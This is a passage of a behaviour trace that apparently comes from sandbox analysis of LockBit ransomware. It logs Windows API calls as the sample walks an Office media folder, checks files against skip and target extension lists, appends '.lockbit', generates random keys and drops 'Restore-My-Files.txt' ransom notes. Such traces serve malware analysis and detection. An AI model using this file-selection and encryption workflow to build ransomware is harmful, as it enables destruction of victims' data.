(lpString1=".cmd", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.988] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.988] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.988] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.988] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.988] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.988] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.988] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.988] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.989] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0202.989] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0202.989] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0202.989] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0202.989] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0202.989] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0202.989] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10297_.GIF") returned 1 [0202.989] lstrcmpiW (lpString1="ntldr", lpString2="BD10297_.GIF") returned 1 [0202.990] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10297_.GIF") returned 1 [0202.990] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10297_.GIF") returned 1 [0202.990] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10297_.GIF") returned -1 [0202.990] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10297_.GIF") returned 1 [0202.990] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10297_.GIF") returned 1 [0202.990] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0202.990] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF") returned=".GIF" [0202.990] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0202.990] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0202.990] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0202.991] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0202.991] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0202.991] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0202.991] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF.lockbit") returned 78 [0202.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10297_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.993] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.993] malloc (_Size=0x40068) returned 0x3df0008 [0202.993] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1131) returned 1 [0202.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.994] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.994] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.998] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.998] malloc (_Size=0xb2) returned 0x1fa2ed8 [0202.998] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0202.998] free (_Block=0x1fa2ed8) [0202.998] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10297_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0202.998] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0202.999] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.999] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70656e00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc893c20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x70656e00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x467, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10298_.GIF", cAlternateFileName="")) returned 1 [0202.999] lstrcmpiW (lpString1=".", lpString2="BD10298_.GIF") returned -1 [0202.999] lstrcmpiW (lpString1="..", lpString2="BD10298_.GIF") returned -1 [0202.999] PathFindExtensionW (pszPath="BD10298_.GIF") returned=".GIF" [0202.999] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0202.999] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0202.999] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.000] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.000] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.000] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.000] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.000] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.000] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10298_.GIF") returned 1 [0203.001] lstrcmpiW (lpString1="ntldr", lpString2="BD10298_.GIF") returned 1 [0203.001] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10298_.GIF") returned 1 [0203.001] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10298_.GIF") returned 1 [0203.001] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10298_.GIF") returned -1 [0203.001] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10298_.GIF") returned 1 [0203.001] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10298_.GIF") returned 1 [0203.001] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.001] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF") returned=".GIF" [0203.001] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.001] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.001] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.002] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.002] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.002] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.002] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.002] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.002] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.002] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF.lockbit") returned 78 [0203.002] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd10298_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.004] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.004] malloc (_Size=0x40068) returned 0x3df0008 [0203.004] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1127) returned 1 [0203.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.005] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.022] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.023] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.023] free (_Block=0x1fa2ed8) [0203.023] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10298_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.023] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.023] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.023] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71969b00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc893c20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x71969b00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x13b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD10299_.GIF", cAlternateFileName="")) returned 1 [0203.023] lstrcmpiW (lpString1=".", lpString2="BD10299_.GIF") returned -1 [0203.023] lstrcmpiW (lpString1="..", lpString2="BD10299_.GIF") returned -1 [0203.023] PathFindExtensionW (pszPath="BD10299_.GIF") returned=".GIF" [0203.023] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.023] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.023] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.023] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.023] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.023] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.024] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.024] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.024] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.024] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.024] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.024] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD10299_.GIF") returned 1 [0203.025] lstrcmpiW (lpString1="ntldr", lpString2="BD10299_.GIF") returned 1 [0203.025] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD10299_.GIF") returned 1 [0203.025] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD10299_.GIF") returned 1 [0203.025] lstrcmpiW (lpString1="autorun.inf", lpString2="BD10299_.GIF") returned -1 [0203.025] lstrcmpiW (lpString1="thumbs.db", lpString2="BD10299_.GIF") returned 1 [0203.025] lstrcmpiW (lpString1="iconcache.db", lpString2="BD10299_.GIF") returned 1 [0203.025] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.025] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD10299_.GIF") returned=".GIF" [0203.025] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.025] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.025] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.026] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.026] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.026] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.026] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.026] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.026] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.026] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.026] 